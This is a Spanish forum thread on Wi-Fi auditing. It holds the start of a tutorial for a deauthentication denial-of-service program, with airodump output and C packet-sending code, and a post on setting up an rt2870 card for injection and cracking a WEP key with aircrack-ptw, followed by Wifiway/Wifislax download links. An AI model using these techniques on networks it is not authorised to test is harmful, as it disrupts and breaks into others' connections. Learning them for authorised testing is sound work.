C5 E5 15 9D  CA 7C B1 17  09 25 84 05  1D 55 92 59
F0 95 43 2B  54 1F A2 41  B1 24 E1 F8  A5 47 7D 58
04 6C A4 AF  AB BC 27 C2  D9 31 E2 03  6E 7B CC F1
24 AE D0 0B  D9 F1 1A 25  E4 2D EE DC  0B C9 45 48
55 6D 58 55

Pulsa Ctrl+C para cancelar el análisis. Analizar este paquete (s/n) ?s

Frame Control: 08:41
......FromDs : 0
......toDS   : 1
......Trama  : de DATOS
......Cifrado: SI

D4 00 00 00  00 17 9A C3  D6 B9

Pulsa Ctrl+C para cancelar el análisis. Analizar este paquete (s/n) ?s

Frame Control: D4:00
......FromDS : 0
......toDs   : 0
......Trama  : de CONTROL
......Cifrado: NO

... .
... .



3.- Denegación de Servicios mediante el envío de tramas de Disociación o  desautenticación.

Para este ejemplo usaremos airodump con el objeto de fijar la red, el punto de acceso y el/los clientes  asociados.

Usaremos airodump y así fijar nuestro objetivo, recolectar la información necesaria y luego preparar nuestro script  con los parámetros adecuados.

Supongamos que lanzamos airodump mas o menos así

bt src # airodump-ng -w test eth1 -c1 -d 00:16:B6:41:03:5D

CH  1 ][ Elapsed: 0 s ][ 2009-07-14 09:47

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:16:B6:41:03:5D   78   0       16        2    0   1  48  WEP  WEP         TallerWIFI

BSSID              STATION            PWR  Lost  Packets  Probes

00:16:B6:41:03:5D  00:17:9A:C3:D6:B9   75     0        2


Allí vemos las macs del punto de acceso (BSSID) y de la víctima (STATION) que luego tendremos que pasarlas a nuestro  programa, que le he llamdo dos01.c

En este ejemplo, necesitaremos una función nueva que nos permita lanzar el/los paquetes a la red...esta es:  send_packet

int send_packet(void *buf, size_t count) // envio de paquetes WiFi
{
struct wif *wi = _wi_out;
if (wi_write(wi, buf, count, NULL) == -1) {
switch (errno) {
case EAGAIN:
case ENOBUFS:
usleep(10000);
return 0;
}

perror("wi_write()");
return -1;
}
return 0;
}


#77
Buenas:

Gracias al user hpegar de la página hermana:

tengo una linksys rt2870sta y he navegado mucho, y dicen que si esta soprtado, otros que no esta soportado, unos dicen que no inyectan y otros dicen que n sirven..

la vdd es que si sirve, inyecta trafico y monitorea   :xD

eh aqui como instalarla
pues no se si salgan las fotos pero hay les va

me baje el driver de nemesis http://www.mediafire.com/?o3izxzzdyym
, de el foro de aircrack, si lo quieren mandenme un comment  ;D o puntos de taringa ano vdd eso es otra cosa!

luego le hice un make, lo deje asi ya hecho y nadamas lo instalo en slax cada ves que lo ocupo :D

make install
modprobe rt2870sta
ifconfig ra1 up




leugo se pone en modo monitor

airmon-ng start ra1



uso airscript para entrar rapido a checar si inyecta... y????



unos 30 sec. despues




Inyecto!!!!!!!! tengo 30,000 ivs en 4 min sufuciente para sacar la clave wep con aircrack-ptw  ;D ;D ;D

ahora fijo la conecxion wifi pero no sale nada   :-[  ??? ???
dhcpcd ra1

timed out no server dhcp .... etc

osea no se configura la conecxion.. pondria fotos  :P pero hay les va la solucion  ;D un poco rustica!

te metes de nuevo a la carpeta del driver y ejecutas make uninstall

entras a etc/wireless/

y borras rt2870sta ( directorio )

entras a /lib/modules/2.6.21.5/kernel/drivers/net/wireless
y borras  rt2870sta.ko

por que no siempre se borran, instalas el driver de la pagina oficial de ralink
el cual solo entra en modo monitor.

cd (directorio del driver)
make
make install
modprobe rt2870sta

y ahora ya tienes instalada la tarjeta con un driver que si se puede conectar a redes, usa el asisten de wifi slax, o hazlo manualmente y veras como si se puede :D !!

para mas detalles, hacer comment

sino salieron las fotos ver los enlaces  :P :(


TDO LO ANTERIOS SE HIZO EN UNA RED DE LA CUAL SOY ADMINISTRADOR !!!

PERMISOS REALES :) ES MI INTERNET!!!!!!

-------------------

http://img17.imageshack.us/img17/8653/snapshot1rgq.jpg

http://img219.imageshack.us/img219/8103/snapshot2d.jpg

http://img12.imageshack.us/img12/5970/snapshot3cor.jpg

http://img297.imageshack.us/img297/6609/snapshot4s.jpg


Un saludo

ChimoC
#78
Buenas:

Yo recomiendo descargarla con gestores de descargas. Por favor... máximo 4 hilos de descarga...



Quien baje más hilos que se atenga a las consecuencias ;D

wifiway 3.0 final

DESCARGA DESDE SEGURIDADWIRELESS
http://download.wifislax.com/wifiway-3.0-final-v2.iso
http://iso.seguridadwireless.es/iso/wifiway-3.0-final-v2.iso
http://archivos.genocidiodigital.com/imagenes_iso/wifiway-3.0-final-v2.iso
http://www.multiupload.com/6N3SLS0BJN
MD5: 5fb9e92531d87c85dea30853da749763


Wifiway 2.0.3
http://ns2.elhacker.net/isos/WIFIWAY-2.0.3+FINAL.iso
http://download.wifislax.com:8080/WIFIWAY-2.0.3+FINAL.iso
http://www.multiupload.com/EJOOV7F97P

MD5 4f3a7a50225c311c0491a3f9915bc27c


Wifiway.org
wifiway-2.0.2 / 498 MB

http://ns2.elhacker.net/isos/wifiway-2.0.2.iso

http://download.wifislax.com:8080/wifiway-2.0.2.iso


a20ae6f0596fe4855b16829fc410ad98 wifiway-2.0.2.iso

wifiway-2.0.1-small 285 MB - la base-slax ocupa 225MB mas o menos, asi que se amplian solo 60MB para caracteristicas wireless, es poco pesada y muy rapida.

http://download.wifislax.com:8080/wifiway-2.0.1-small.iso

http://download.wifislax.com:8080/wifiway-2.0.1-small.iso.md5

07e65813771354fcfcd1cf23d79c00ce wifiway-2.0.1-small.iso





Wifislax.com
http://download.wifislax.com:8080/wifislax-3.1.iso
http://download.wifislax.com:8080/wifislax-3.1.iso.md5
http://download.wifislax.com:8080/wifislax-small-3.1.iso
http://download.wifislax.com:8080/wifislax-small-3.1.iso.md5
http://download.wifislax.com:8080/wifislax-3.0.iso
http://download.wifislax.com:8080/wifislax-3.0.iso.md5
http://download.wifislax.com:8080/wifislax-2.0.iso
http://download.wifislax.com:8080/wifislax-2.0.iso.md5
http://download.wifislax.com:8080/wifislax-1.2-beta.iso
http://download.wifislax.com:8080/wifislax-1.2-beta.iso.md5


Wifiway 1.0
http://download.wifislax.com:8080/wifiway-1-final.iso
http://download.wifislax.com:8080/wifiway-1-final.iso.md5
http://download.wifislax.com:8080/wifiway-1.0-beta2.iso
http://download.wifislax.com:8080/wifiway-1.0-beta2.iso.md5
http://download.wifislax.com:8080/wifiway-0.8.iso
http://download.wifislax.com:8080/wifiway-0.8.iso.md5
http://download.wifislax.com:8080/wifiway-0.6.iso
http://download.wifislax.com:8080/wifiway-0.6.iso.md5
http://download.wifislax.com:8080/wifiway-0.4.iso
http://download.wifislax.com:8080/wifiway-0.4.iso.md5
http://download.wifislax.com:8080/wifiway-1.0-lxde.iso (http://foro.elhacker.net/wireless_en_linux/wifiway_10_final_con_entorno_lxde-t274129.0.html)

Descraga alternativa de Wifiway 1.0.FINAL

http://www.antofalinux.cl/distros/wifiway/wifiway-1-final.iso

Descarga Wifislax 3.1. con soporte para atheros ar5007EG

WifiSlax 3.1 LiveCD/USB con soporte para Atheros AR5007EG.iso

MD5: a5d76e833887201b929bd0c09f30194d

Un saludo

ChimoC
#79
Buenas:

Palabrita que he puesto buscar 400 días... y no lo he encontrado

Mi curiosidad es si se pueden ver las estadísticas del foro, ya que al pinchar sobre ellas me dice que no estoy autorizado (mira que es listo el "bichejo").  :P

Un saludo

ChimoC